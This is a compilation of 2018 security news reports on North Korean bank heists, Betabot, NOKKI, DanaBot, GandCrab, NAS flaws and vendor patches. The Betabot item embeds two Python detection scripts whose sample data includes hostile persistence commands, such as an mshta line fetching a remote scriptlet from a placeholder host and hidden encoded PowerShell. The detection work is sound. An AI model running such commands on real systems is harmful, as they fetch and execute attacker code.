The deployed scripts apparently inspected inbound financial request messages for specific primary account numbers (PANs) and could generate fraudulent responses only for the requests that matched the expected PANs.

While the initial infection vector hasn’t been identified, Lazarus is known for the use of spear-phishing emails in targeted attacks against bank employees and might have employed Windows-based malware “to explore a bank’s network to identify the payment switch application server.” Lateral movement was likely performed leveraging legitimate credentials.

Alongside the joint alert, the DHS also published a malware analysis report (MAR-10201537) to provide details on the malware Hidden Cobra used as part of the FASTCash attacks. Of a total of 10 files submitted for analysis, four were found to be malicious, two were command-line utility applications, three were applications offering export functions and methods to interact with financial systems, and one was a log file.

The identified malicious programs include Trojans and various backdoors that could retrieve system information, find and manipulate files, execute and terminate processes, download and upload files, and execute commands. In addition to Windows, the Trojans targeted IBM’s Advanced Interactive Executive (AIX) platform, which was running on the compromised payment switch application servers.

The FASTCash scheme only appears to have targeted banks in Africa and Asia, with no incidents observed in the U.S.


NKorea Said to Have Stolen a Fortune in Online Bank Heists
4.10.2018 securityweek
APT

North Korea’s nuclear and missile tests have stopped, but its hacking operations to gather intelligence and raise funds for the sanction-strapped government in Pyongyang may be gathering steam.

U.S. security firm FireEye raised the alarm Wednesday over a North Korean group that it says has stolen hundreds of millions of dollars by infiltrating the computer systems of banks around the world since 2014 through highly sophisticated and destructive attacks that have spanned at least 11 countries. It says the group is still operating and poses “an active global threat.”

It is part of a wider pattern of malicious state-backed cyber activity that has led the Trump administration to identify North Korea — along with Russia, Iran and China — as one of the main online threats facing the United States. Last month, the Justice Department charged a North Korean hacker said to have conspired in devastating cyberattacks, including an $81 million heist of Bangladesh’s central bank and the WannaCry virus that crippled parts of Britain’s National Health Service.

On Tuesday, the U.S. Department of Homeland Security warned of the use of malware by Hidden Cobra, the U.S. government’s byword for North Korean hackers, in fraudulent ATM cash withdrawals from banks in Asia and Africa. It said that Hidden Cobra was behind the theft of tens of millions of dollars from teller machines in the past two years. In one incident this year, cash had been simultaneously withdrawn from ATMs in 23 different countries, it said.

North Korea, which prohibits access to the world wide web for virtually all its people, has previously denied involvement in cyberattacks, and attribution for such attacks is rarely made with absolute certainty. It is typically based on technical indicators such as the Internet Protocol addresses that identify computers and characteristics of the coding used in malware, which is the software a hacker may use to damage or disable computers.

But other cybersecurity experts tell The Associated Press that they also see continued signs that North Korea’s authoritarian government, which has a long track record of criminality to raise cash, is conducting malign activity online. That activity includes targeting of financial institutions and crypto-currency-related organizations, as well as spying on its adversaries, despite the easing of tensions between Pyongyang and Washington.

“The reality is they are starved for cash and are continuing to try and generate revenue, at least until sanctions are diminished,” said Adam Meyers, vice president of intelligence at CrowdStrike. “At the same time, they won’t abate in intelligence collection operations, as they continue to negotiate and test the international community’s resolve and test what the boundaries are.”

CrowdStrike says it has detected continuing North Korean cyber intrusions in the past two months, including the use of a known malware against a potentially broad set of targets in South Korea, and a new variant of malware against users of mobile devices that use a Linux-based operating system.

This activity has been taking place against the backdrop of a dramatic diplomatic shift as Kim Jong Un has opened up to the world. He has held summits with South Korean President Moon Jae-in and with President Donald Trump, who hopes to persuade Kim to relinquish the nuclear weapons that pose a potential threat to the U.S. homeland. Tensions on the divided Korean Peninsula have dropped and fears of war with the U.S. have ebbed. Trump this weekend will dispatch his top diplomat, Mike Pompeo, to Pyongyang for the fourth time this year to make progress on denuclearization.

But North Korea has yet to take concrete steps to give up its nuclear arsenal, so there’s been no let-up in sanctions that have been imposed to deprive it of fuel and revenue for its weapons programs, and to block it from bulk cash transfers and from accessing the international banking system.

FireEye says APT38, the name it gives to the hacking group dedicated to bank theft, has emerged and stepped up its operations since February 2014 as the economic vise on North Korea has tightened in response to its nuclear and missile tests. Initial operations targeted financial institutions in Southeast Asia, where North Korea had experience in money laundering, but then expanded into other regions such as Latin America and Africa, and then extended to Europe and North America.

In all, FireEye says APT38 has attempted to steal $1.1 billion, and based on the data it can confirm, has gotten away with hundreds of millions of dollars. It has used malware to insert fraudulent transactions in the Society for Worldwide Interbank Financial Telecommunication, or SWIFT, system that is used to transfer money between banks. Its biggest heist to date was $81 million stolen from the central bank of Bangladesh in February 2016. The funds were wired to bank accounts established with fake identities in the Philippines. After the funds were withdrawn they were suspected to have been laundered in casinos.

The Foundation for Defense of Democracies, a Washington think tank, said in a report Wednesday that North Korea’s cyber capabilities provide an alternative means for challenging its adversaries. While Kim’s hereditary regime appears to prioritize currency generation, attacks using the SWIFT system raise concerns that North Korean hackers “may become more proficient at manipulating the data and systems that undergird the global financial system,” it says.

Sandra Joyce, FireEye’s head of global intelligence, said that while APT38 is a criminal operation, it leverages the skills and technology of a state-backed espionage campaign, allowing it to infiltrate multiple banks at once and figure out how to extract funds. On average, it dwells in a bank’s computer network for 155 days to learn about its systems before it tries to steal anything. And when it finally pounces, it uses aggressive malware to wreak havoc and cover its tracks.

“We see this as a consistent effort, before, during and after any diplomatic efforts by the United States and the international community,” said Joyce, describing North Korea as being “undeterred” and urging the U.S. government to provide more specific threat information to financial institutions about APT38’s modus operandi. APT stands for Advanced Persistent Threat.

The Silicon Valley-based company says it is aware of continuing, suspected APT38 operations against other banks. The most recent attack it is publicly attributing to APT38 was against one of Chile’s biggest commercial banks, Banco de Chile, in May this year. The bank has said a hacking operation robbed it of $10 million.

FireEye, which is staffed with a roster of former military and law-enforcement cyberexperts, conducted malware analysis for a criminal indictment by the Justice Department last month against Park Jin Hyok, the first time a hacker said to be from North Korea has faced U.S. criminal charges. He’s accused of conspiring in a number of devastating cyberattacks: the Bangladesh heist and other attempts to steal more than $1 billion from financial institutions around the world; the 2014 breach of Sony Pictures Entertainment; and the WannaCry ransomware virus that in 2017 infected computers in 150 countries.


Tesco Bank Fined by UK Regulator Over Hacking
4.10.2018 securityweek
Hacking

Britain's Tesco Bank has been fined £16.4 million ($21.4 million, 18.4 million euros) for failing to protect customers during a 2016 cyber attack, regulators said Monday.

The supermarket's bank division failed "to exercise due skill, care and diligence in protecting its personal current account holders against a cyber attack", the Financial Conduct Authority said in a statement.

The attackers netted £2.26 million during the 48-hour incident in November 2016, according to the watchdog.

Tesco Bank in UK: Image Credit: Tesco Bank

The attack "exploited deficiencies" in the design of Tesco Bank's debit card, as well as its financial crime controls and financial crime operations team, it said.

Tesco Bank customers were therefore left vulnerable to what the regulator described as a largely avoidable incident.

"The fine the FCA imposed on Tesco Bank today reflects the fact that the FCA has no tolerance for banks that fail to protect customers from foreseeable risks," said Mark Steward, FCA executive director of enforcement and market oversight.

"In this case, the attack was the subject of a very specific warning that Tesco Bank did not properly address until after the attack started.

"This was too little, too late. Customers should not have been exposed to the risk at all."


Palo Alto Networks to Acquire Cloud Security Firm RedLock for $173 Million
4.10.2018 securityweek
IT

Palo Alto Networks on Wednesday announced that it has entered a definitive agreement to acquire cloud security company RedLock for roughly $173 million in cash.

The acquisition is expected to be completed in Palo Alto Networks’ first fiscal quarter. RedLock co-founders Varun Badhwar and Gaurav Kumar will join Palo Alto Networks as part of the deal.

RedLock’s AI-powered Cloud 360 platform helps organizations protect their public cloud environments by providing deep visibility, threat detection, risk prioritization, remediation, and incident response capabilities.

Palo Alto Networks already provides a wide range of security services for cloud environments. Its offering was expanded earlier this year following the acquisition of Evident.io for $300 million in cash.

It now plans on combining Evident and RedLock technologies to provide a single offering that encompasses cloud security analytics, continuous security, threat detection, and compliance monitoring. The new offering is expected to become available early next year.

“We are thrilled to add RedLock's technology to our cloud security offerings,” said Nikesh Arora, chairman and CEO of Palo Alto Networks. “The addition of their technologies allows us to offer the most comprehensive security for multi-cloud environments, including Amazon Web Services, Google Cloud Platform and Microsoft Azure, and significantly strengthens our cloud strategy going forward.”


Betabot - An Example of Cheap Modern Malware Sophistication
4.10.2018 securityweek
Virus

What appears to be a new campaign delivering the Betabot malware has been detected by security researchers. It doesn't look as if this campaign is directly related to the wide-ranging campaign disclosed by Kaspersky Lab in August. However, like the Kaspersky campaign, this one also uses phishing as the original point of infection.

"The campaign doesn't seem directly related to the Kaspersky report," Assaf Dahan, senior director, threat hunting at Cybereason's Nocturnus Research told SecurityWeek. "The TTPs are quite different. The campaign discussed in our report seems less targeted, and originates from generic phishing emails."

Cybereason does not know who is behind the new campaign. "Since Betabot's source code and old builders are available online in hacking forums (or new ones sold rather cheaply, ~$200), it is hard to estimate who is behind it," added Dahan.

"The Betabot infections seen in our telemetry originated from phishing campaigns that used social engineering to persuade users to download and open what appears to be a Word document that is attached to an email," explains the report.

Betabot, also known as Neurevt, first appeared in late 2012. "The malware began as a banking Trojan," writes Dahan, "and is now packed with features that allow its operators to practically take over a victim's machine and steal sensitive information." Its main features include a form grabber, FTP and mail client stealer, banking, USB infection, Userland rootkit, command execution via shell, additional malware downloads, persistence, and a crypto-currency miner (which was added in late 2017).

It attempts to be persistent and to hide its presence by using all the tricks available, including anti-debugging, anti-virtual machine/sandbox, anti-disassembly and the ability to detect security products and analysis tools. It also seeks to find and eliminate any other malware on the system "with heuristic approaches that would put many security products to shame."

The infection chain starts with social engineering designed to get users to download and open what appears to be an attached Word document. It exploits an 18-year-old vulnerability in the Equation Editor tool in Microsoft Office that was patched in 2017 (CVE-2017-11882).

If successful, the weaponized RTF document executes dqfm.cmd, which spawns hondi.cmd. Hondi does preparatory work and executes the Betabot dropper, mondi.exe. This extracts the Betabot loader and the encrypted main payload, and injects it into its own child process. Betabot then examines all running processes to find additional injection candidates.

"In many of the cases Cybereason observed," writes Dahan, "the Betabot loader injected its code into multiple running processes for persistence and maximized survival purposes. If an injected process is terminated, another process will kick in and spawn the loader as a child process."

While the first candidate is usually a second instance of explorer.exe, Cybereason has seen Betabot injecting itself into a McAfee process called shtat.exe. Once injected, Betabot attempts to connect to its C2 servers.
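The process chain described above (Word document, Equation Editor exploit, dqfm.cmd, hondi.cmd, mondi.exe, and mondi.exe injecting into its own child) can be matched against endpoint process-creation telemetry. The following is an added example, not Cybereason's or the page's code: a small process-tree detector run over constructed log lines. It assumes a simple `pid=...;ppid=...;image=...;cmdline=...` line format, and the Equation Editor binary name EQNEDT32.EXE, which the page does not mention.

```python
"""Added example: detect the Betabot dropper chain in process-creation logs.

Not Cybereason's code. The log format and the sample events below are
constructed for this example; the file names come from the report above.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Parents that should never legitimately launch a command script.
# EQNEDT32.EXE is the Equation Editor binary (assumed name, not on the page).
OFFICE_PARENTS = {"winword.exe", "eqnedt32.exe"}
# Dropper chain from the report: dqfm.cmd -> hondi.cmd -> mondi.exe
DROPPER_CHAIN = ["dqfm.cmd", "hondi.cmd", "mondi.exe"]

LINE_RE = re.compile(r"pid=(\d+);ppid=(\d+);image=([^;]+);cmdline=(.*)")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

    def effective_name(self) -> str:
        """cmd.exe running a .cmd script is identified by the script's basename."""
        for token in self.cmdline.split():
            if token.lower().endswith(".cmd"):
                return token.lower().rsplit("\\", 1)[-1]
        return self.image.lower()


def parse_events(lines: List[str]) -> List[ProcEvent]:
    """Parse the constructed log format; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.fullmatch(line.strip())
        if m:
            events.append(ProcEvent(int(m[1]), int(m[2]), m[3], m[4]))
    return events


def detect_betabot_chain(events: List[ProcEvent]) -> List[Tuple[str, str, str, int]]:
    """Return (rule, parent_name, child_name, child_pid) for each suspicious edge."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue  # parent not in this log window
        child, par = e.effective_name(), parent.effective_name()
        # Rule 1: Word / Equation Editor spawning a command script.
        if par in OFFICE_PARENTS and child.endswith(".cmd"):
            findings.append(("office_spawns_cmd", par, child, e.pid))
        # Rule 2: consecutive links of the known dropper chain.
        if (par in DROPPER_CHAIN and child in DROPPER_CHAIN
                and DROPPER_CHAIN.index(child) == DROPPER_CHAIN.index(par) + 1):
            findings.append(("dropper_chain", par, child, e.pid))
        # Rule 3: the dropper spawning a copy of itself (loader injected into child).
        if par == "mondi.exe" and child == "mondi.exe":
            findings.append(("self_injection", par, child, e.pid))
    return findings


# Constructed sample telemetry (Equation Editor runs out-of-process, so its
# parent is not WINWORD.EXE; the .cmd scripts run under cmd.exe).
SAMPLE_LOG = r"""
pid=100;ppid=1;image=explorer.exe;cmdline=C:\Windows\explorer.exe
pid=200;ppid=100;image=WINWORD.EXE;cmdline="WINWORD.EXE" /n invoice.doc
pid=210;ppid=1;image=EQNEDT32.EXE;cmdline="EQNEDT32.EXE" -Embedding
pid=220;ppid=210;image=cmd.exe;cmdline=cmd /c C:\Users\u\AppData\Local\Temp\dqfm.cmd
pid=230;ppid=220;image=cmd.exe;cmdline=cmd /c hondi.cmd
pid=240;ppid=230;image=mondi.exe;cmdline=C:\Users\u\AppData\Local\Temp\mondi.exe
pid=250;ppid=240;image=mondi.exe;cmdline=C:\Users\u\AppData\Local\Temp\mondi.exe
pid=300;ppid=100;image=notepad.exe;cmdline=notepad.exe
""".strip().splitlines()

if __name__ == "__main__":
    for rule, par, child, pid in detect_betabot_chain(parse_events(SAMPLE_LOG)):
        print(f"{rule}: {par} -> {child} (pid {pid})")
```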

Cybereason describes Betabot as paranoid, doing everything it can to prevent detection and maintain persistence. It seeks to detect a virtual environment by querying the registry and looking for the names of virtual machine vendors such as VMware, VirtualBox and Parallels, as well as searching for specific drivers' vendor files. It also checks for indications of a sandbox, and attempts to prevent debugging.

Betabot attempts to detect -- and sometimes remove -- 30 different leading anti-malware products. Apart from trying to neutralize threats to its presence, it also seeks to eliminate rival malware (which could attract the attention of security teams).

"Betabot will attempt to detect other bots and malware on the infected host," writes Dahan, "by looking for common malware persistence patterns and other heuristic features. For example, Betabot will enumerate registry autorun keys to look for suspicious-looking persistence indicators that are common in malware."

It even has a routine that looks for script-based fileless malware persistence patterns.
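The autorun-key sweep Betabot runs against rival malware is, turned around, exactly the hunt a defender runs against Betabot itself. The script below is an added example written for this page, not Cybereason's tooling or Betabot's code: it scores Run-key command lines against the persistence heuristics the article lists (user-writable install paths, system binary names outside the Windows directory, script-host launchers, encoded or hidden PowerShell, and script-based fileless persistence that pulls its payload from the registry or a remote scriptlet). The SAMPLE_RUN_ENTRIES values are constructed for the demo, the example.invalid host and the truncated -enc blob are placeholders rather than real indicators, and read_run_keys() is the only part that touches a live Windows registry.

```python
"""Heuristic sweep of Windows Run-key entries for common malware
persistence patterns. Added example, not Cybereason's or Betabot's code.
SAMPLE_RUN_ENTRIES is constructed for the demo; on a live Windows host
read_run_keys() pulls the real values via winreg."""
import re

# Constructed Run-key values (value name -> command line); the .invalid
# domain and the truncated -enc blob are placeholders, not real IoCs.
SAMPLE_RUN_ENTRIES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
    "WindowsUpdater": r"C:\Users\alice\AppData\Roaming\svchost.exe",
    "Adobe Speed": r'wscript.exe //B "C:\Users\alice\AppData\Local\Temp\update.vbs"',
    "Sync": r"powershell.exe -w hidden -enc SQBFAFgAIAAo...",
    "Loader": r'mshta.exe vbscript:Execute("GetObject(""script:http://example.invalid/a.sct"")")',
    "RegLoader": r'powershell -c "iex ((gp HKCU:\Software\Foo).Payload)"',
}

# (label, pattern) pairs, evaluated in order against each command line.
RULES = [
    ("user-writable path",
     re.compile(r"\\(Temp|ProgramData|Public)\\|\\AppData\\Roaming\\", re.I)),
    ("script host launcher",
     re.compile(r"\b(wscript|cscript|mshta)\.exe", re.I)),
    ("encoded PowerShell",
     re.compile(r"powershell[^|]*\s-(e|ec|enc|encodedcommand)\b", re.I)),
    ("hidden window",
     re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("fileless: payload read from registry",
     re.compile(r"\b(gp|get-itemproperty)\b.*\bHK(CU|LM)", re.I)),
    ("fileless: remote scriptlet",
     re.compile(r"script:https?://", re.I)),
]

# Binary names that only belong under the Windows directory.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe",
                "explorer.exe", "services.exe"}
WINDOWS_DIR = re.compile(r"(%windir%|%systemroot%|\\windows\\)", re.I)


def masquerades_as_system_binary(cmd):
    """True when a protected system binary name runs from outside the Windows dir."""
    m = re.search(r"([^\\/\"]+\.exe)", cmd, re.I)
    if not m:
        return False
    return m.group(1).lower() in SYSTEM_NAMES and not WINDOWS_DIR.search(cmd)


def score_entry(cmd):
    """Return the list of heuristic labels that match one command line."""
    hits = [label for label, rx in RULES if rx.search(cmd)]
    if masquerades_as_system_binary(cmd):
        hits.append("system binary name outside Windows dir")
    return hits


def sweep(entries):
    """Map value name -> labels for every entry that trips at least one rule."""
    results = {}
    for name, cmd in entries.items():
        hits = score_entry(cmd)
        if hits:
            results[name] = hits
    return results


def read_run_keys():
    """Read the current user's Run key on Windows (returns {} elsewhere)."""
    try:
        import winreg
    except ImportError:
        return {}
    entries = {}
    path = r"Software\Microsoft\Windows\CurrentVersion\Run"
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        i = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:  # raised once the values are exhausted
                break
            entries[name] = str(data)
            i += 1
    return entries


if __name__ == "__main__":
    for name, labels in sweep(SAMPLE_RUN_ENTRIES).items():
        print(f"{name}: {', '.join(labels)}")
```

The two benign entries pass clean only because the rules are deliberately conservative (OneDrive legitimately runs from AppData\Local, so only Roaming, Temp, ProgramData and Public count as suspicious install paths); in production such a sweep still needs an allowlist of known-good entries, and the HKLM Run, RunOnce and Winlogon keys would be read the same way as HKCU.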

Boston, MA-based Cybereason raised $100 million in Series D funding from SoftBank Corp in June 2017, bringing the total investment in the cyber-attack detection firm to $189 million since it was founded in 2012.


Researchers associated the recently discovered NOKKI Malware to North Korean APT
3.10.2018 securityaffairs
APT

Security experts from Palo Alto Networks have collected evidence that links the recently discovered NOKKI malware to a North Korea-linked APT.
Researchers from Palo Alto Networks have spotted a new variant of the KONNI malware, tracked as NOKKI, that was attributed to North Korea-linked attackers.

NOKKI borrows code from the KONNI malware. The latter is a remote access Trojan (RAT) used in targeted attacks on organizations linked to North Korea, while NOKKI was used to target politically-motivated victims in Eurasia and Southeast Asia.

KONNI went undetected for more than 3 years; it was able to avoid detection thanks to its continuous evolution, with recent versions capable of executing arbitrary code on the target systems and stealing data.

The NOKKI variant has been in use since at least January 2018, and experts attributed it to the Reaper group.

“Beginning in early 2018, Unit 42 observed a series of attacks using a previously unreported malware family, which we have named ‘NOKKI’.” reads the analysis published by Palo Alto Networks.

“The malware in question has ties to a previously reported malware family named KONNI, however, after careful consideration, we believe enough differences are present to introduce a different malware family name. To reflect the close relationship with KONNI, we chose NOKKI, swapping KONNI’s Ns and Ks.”

NOKKI is able to gather a broad range of data (i.e. IP address, hostname, username, drive information, operating system information, installed programs) from the infected systems; it is also able to fetch and execute a payload, as well as to drop and open decoy documents.

The malicious code writes the collected information to %LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp.

In January, the researchers observed several attacks involving the NOKKI malware that targeted Cambodian speakers with an interest in Cambodian political matters, and targets in Russia with documents written in Cyrillic featuring content related to local political issues.

A few days ago, researchers from Palo Alto Networks published another report that associated the NOKKI malware with the DOGCALL backdoor attributed to the Reaper group.

The analysis of the macros included in the Microsoft Word decoy documents revealed that they were designed to drop the NOKKI malware, and that they employed a deobfuscation technique that was also used in documents targeting individuals interested in the World Cup hosted in Russia in 2018 with the DOGCALL malware.

“Based on the original filename, we can surmise this malware sample targeted individuals interested in the World Cup hosted in Russia in 2018. As we can see in the figure below, the unique deobfuscation routine used between the samples is identical, including the comments included by the author.” reads the report published by Palo Alto Networks.

NOKKI vs WordCup malware

“While the deobfuscation routine was identical, the actual functionality of the macro differed slightly. The NOKKI dropper samples downloaded both a payload and a decoy document, but this World Cup predictions malware sample downloads and executes a remote VBScript file wrapped in HTML and appends text to the original Word document to provide the lure for the victim.”

The VBScript file uses the same deobfuscation routine and fetches and executes a dropper tracked as Final1stspy, which in turn downloads a strain of the DOGCALL malware.

The malware implements backdoor features, can take screenshots, log keystrokes, enable the microphone, collect victim information, collect files of interest, and download and execute additional payloads.

The malware connects to its command and control (C&C) infrastructure via third-party hosting services such as Dropbox, pCloud, Yandex Cloud, and Box.

“What originally began as research surrounding a new malware family named NOKKI that had code overlap and other ties to KONNI lead us to an interesting discovery tying the NOKKI malware family to the Reaper threat actor group.” Palo Alto Networks concludes.

“Additionally, we discovered yet another malware family that has not been previously publicly reported that we have named Final1stspy.”


New Danabot Banking Malware campaign now targets banks in the U.S.
3.10.2018 securityaffairs
Virus

According to malware researchers from Proofpoint, DanaBot attackers launched a new campaign aimed at banks in the United States.
A couple of weeks ago, security experts at ESET observed a surge in activity of the DanaBot banking Trojan, which was targeting Poland, Italy, Germany, Austria, and as of September 2018, Ukraine.

DanaBot is a multi-stage modular banking Trojan written in Delphi; the malware allows operators to add new functionalities by adding new plug-ins.

When it was first analyzed by Proofpoint, its experts speculated that the threat had been under active development.

The banking Trojan initially targeted Australian and Polish users, then expanded to other countries, including Italy, Germany, Austria, and as of September 2018, Ukraine.

According to Proofpoint, DanaBot attackers have now launched a new campaign aimed at banks in the United States as well. Experts monitored different campaigns, each using a different ID found in server communications, a circumstance that suggests DanaBot is being offered through the malware-as-a-service model.

Proofpoint has identified 9 different actors, each distributing the Trojan to a specific region; experts highlighted that only Australia was targeted by two different groups of attackers.

“Based on distribution methods and targeting, we have been grouping DanaBot activity using an “affiliate ID” that we have observed in various part of the C&C protocol (e.g., offset 0xc of the 183-byte binary protocol header). ” reads the report published by ProofPoint.

The campaign against North America uses spam messages that pretend to be digital faxes from eFax.

Danabot Banking Malware

When the recipient clicks on the download button included in the content of the message, it will download a weaponized Word document that poses as an eFax.

If the recipient enables the macros to properly view the fax, the malicious code executes the embedded Hancitor malware, which downloads two versions of the Pony stealer and the DanaBot banking malware.

“The emails used an eFax lure (Figure 1) and contained a URL linking to the download of a document containing malicious macros (Figure 2). The macros, if enabled by the user, executed the embedded Hancitor malware [3], which, in turn, received tasks to download two versions of Pony stealer and the DanaBot banking malware.” continues the analysis.

Experts from Proofpoint highlighted that each affiliate ID is using different distribution methods: some actors leverage the Fallout Exploit Kit, others web injects or malspam campaigns. Researchers also found similarities between DanaBot and the CryptXXX ransomware, which used a custom command and control protocol on TCP port 443.

Proofpoint speculates that DanaBot’s C&C traffic is an evolution of this protocol, adding AES encryption on top of the Zlib compression.

The researchers believe that the developers created DanaBot as part of an evolution of CryptXXX.

“Thus it would seem that Danabot follows in a long line of malware from one particular group. This family began with ransomware, to which stealer functionality was added in Reveton.” concludes Proofpoint.

“The evolution continued with CryptXXX ransomware and now with a banking Trojan with Stealer and remote access functionality added in Danabot.”


Experts found 9 NAS flaws that expose LenovoEMC, Iomega Devices to hack
3.10.2018 securityaffairs
Vulnerability

Experts discovered nine vulnerabilities affecting NAS devices that could be exploited by unauthenticated attackers to access protected content.
Nine flaws affecting NAS devices could be exploited by unauthenticated attackers to access protected content.

The vulnerabilities are tracked as CVE-2018-9074, CVE-2018-9075, CVE-2018-9076, CVE-2018-9077, CVE-2018-9078, CVE-2018-9079, CVE-2018-9080, CVE-2018-9081 and CVE-2018-9082.

According to Lenovo, the flaws affect 20 models of network attached storage (NAS) devices sold by the company, including Lenovo-branded NAS devices, LenovoEMC, and Iomega.

The list of vulnerable devices includes eight LenovoEMC NAS (PX) models, nine Iomega StoreCenter (PX and IX) models and the Lenovo-branded devices: ix4-300d, ix2 and EZ Media and Backup Center.

The flaws have been discovered as a part of a research project conducted by ISE Labs focused on the security of embedded devices.

Lenovo NAS

Most of the devices audited by the researchers were affected by some sort of OS command injection vulnerability that could be exploited by remote attackers to obtain a root shell and take over the targeted system.

By chaining different vulnerabilities it is possible to gain full access to the device; the experts noticed, for example, that possession of the user’s access token and a session cookie-like identifier (the “__c” parameter) would be enough for attackers to reach that goal. A typical attack scenario to obtain this information sees attackers luring an authenticated NAS user into visiting a specially crafted malicious website.

“If we want to exploit this OS command injection we are going to need to figure out how these tokens are generated or access to the victim’s iomegaUserCookie (__c) token. Whenever I think about stealing some type of value stored in the user’s browser I think about cross-site scripting (XSS).” state the researchers.

The experts found a cross-site scripting vulnerability that allowed them to access the information, then used stored browser data to execute commands on the vulnerable devices.

Once an attacker has obtained a target’s NAS access token and “__c” parameter, reaching the storage device only requires knowing its static IP address, a trivial step for attackers.

In summary, by chaining the command injection vulnerability with the privilege escalation issues, an attacker could execute commands on the devices on behalf of legitimate users.

The experts reported the vulnerabilities to Lenovo on August 3 and the company issued patches for vulnerable systems on Sept. 20 and publicly disclosed the vulnerabilities on September 30.

The list of CVEs includes: CVE-2018-9074, CVE-2018-9075, CVE-2018-9076, CVE-2018-9077, CVE-2018-9078, CVE-2018-9079, CVE-2018-9080, CVE-2018-9081 and CVE-2018-9082.

Lenovo confirmed that firmware versions 4.1.402.34662 and earlier are vulnerable; users should update to firmware version 4.1.404.34716 (or later).

The company suggests removing any public shares and using the device only on trusted networks in case it is not possible to immediately update the firmware.


Z-LAB Report – Analyzing the GandCrab v5 ransomware
3.10.2018 securityaffairs
Ransomware

Experts at the Cybaze Z-Lab have analyzed the latest iteration of the infamous GandCrab ransomware, version 5.0.
Malware researchers at Cybaze ZLab analyzed the latest version of the infamous GandCrab ransomware, version 5.0. Most of the infections have been observed in central Europe, but experts found evidence that the malicious code doesn’t infect Russian users. GandCrab operates like a classic ransomware: it encrypts all user files and drops some ransom notes on the infected machine.

The ransomware uses a pseudo-random extension (5 characters long) that is different for each infection (some of these extensions are .txvpq, .rttmc, .mcbot, etc.).

The ransom note contains some information related to the infection: an ID (“fed0a66240f8743f”, in the image below), a “GANDCRAB KEY”, required to restore the original files, and some encrypted information about the infected system such as the username, the PC name, the domain, the operating system and the language.

GandCrab 5

Unlike GandCrab v4, this version is able to kill processes associated with some popular applications (e.g. Word, Excel, SQL Server) so that the code can encrypt files that those applications hold open.

GandCrab 5

The payment process is implemented through the hidden service associated with the Tor address hxxp://gandcrabmfe6mnef[.]onion, which is the same used by previous versions of the malware.

Technical details, including IoCs and Yara Rules, are reported in the analysis shared by researchers at the ZLab.


Foxit Reader 9.3 addresses 118 Vulnerabilities, 18 of them rated as critical
3.10.2018 securityaffairs
Vulnerability

Foxit Software released a security update for its Foxit Reader product that addresses over 100 vulnerabilities, 18 of them rated as critical.
Foxit Software released a security update for its Foxit Reader product that addresses over 100 vulnerabilities, some of them that could be exploited by a remote attacker to execute arbitrary code.

Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files, and it has hundreds of millions of installations.

Foxit has released Reader 9.3 and Foxit PhantomPDF 9.3 to address security and stability issues.

Foxit Reader 9.3 addressed a broad range of vulnerabilities, including out-of-bounds, use-after-free, information disclosure, type confusion, and memory corruption bugs.

The updates fix a total of 116 vulnerabilities, 18 of which are rated as “critical” and were discovered by researchers at the Cisco Talos group.

The flaws affect the JavaScript engine of Foxit Reader; an attacker could trigger them by creating specially crafted web pages or PDF documents.

The updates were issued a couple of days before Adobe released security patches for 86 flaws in the Mac and Windows versions of Adobe Acrobat and Adobe Reader, 46 of them rated as critical.


New Twitter Rules Target Fake Accounts, Hackers
2.10.2018 securityweek
Social

Twitter on Monday announced that it has made some changes in preparation for the upcoming midterm elections in the United States. The changes include updated rules that target fake accounts and hackers.

Social media companies have been criticized for allowing their platforms to be abused for influence campaigns ahead of the 2016 presidential election in the U.S. In response, Twitter, Facebook and Google have started taking steps to neutralize these types of operations, particularly by blocking accounts used to spread false information in an effort to manipulate users.

Twitter has now announced some updates on what it described as its “elections integrity efforts,” including changes to the Twitter rules.

The updated Twitter rules target three main issues, and one of them is fake accounts. The social media giant – based on feedback from users – has decided to suspend not just accounts involved in spam campaigns, but also accounts “engaged in a variety of emergent, malicious behaviors.”

The company plans on identifying fake accounts based on several factors, including the use of stock or stolen profile photos, the use of copied profile descriptions, and intentionally misleading profile information, such as location.

The second key issue targeted by the updated rules is related to “attributed activity.” Twitter will now crack down on accounts that it can reliably link to entities known to have violated its rules. This includes accounts that mimic or aim to replace previously suspended accounts.

Finally, Twitter is targeting accounts that distribute hacking-related materials. Until now, it prohibited the distribution of private information, trade secrets or materials that could cause harm to individuals. The rules have now been expanded to include users that take responsibility for a cyberattack, and ones that make threats or offer incentives to hack specific accounts.

“Commentary about a hack or hacked materials, such as news articles discussing a hack, are generally not considered a violation of this policy,” Twitter representatives wrote in a blog post.

Twitter claims its previously implemented measures are already paying off. The company says it recently removed roughly 50 accounts falsely claiming to be associated with the U.S. Republican party.

“We have also taken action on Tweets sharing media regarding elections and political issues with misleading or incorrect party affiliation information. We continue to partner closely with the RNC, DNC, and state election institutions to improve how we handle these issues,” Twitter said.

The company also pointed out that it recently closed 770 Iran-linked accounts engaging in coordinated manipulation, it challenged millions of potential spam accounts, and it removed hundreds of thousands of apps and tightened access to its API.

Twitter also announced some updates that impact users’ timelines. The company wants to ensure that users receive the most relevant information related to the elections, and it’s making it easier for users to identify legitimate candidate accounts. Candidates are being offered increased support and advised to enable two-factor authentication on their accounts for better security.


Adobe Patches 86 Vulnerabilities in Acrobat Products
2.10.2018 securityweek
Vulnerability

Adobe on Monday released updates for the Windows and macOS versions of its Acrobat products to address tens of vulnerabilities, including critical issues that allow arbitrary code execution.

Acrobat DC and Acrobat Reader DC (Continuous) 2019.008.20071, Acrobat 2017 and Reader DC 2017 (Classic 2017) 2017.011.30105, and Acrobat DC and Reader DC (Classic 2015) 2015.006.30456 patch a total of 86 flaws.

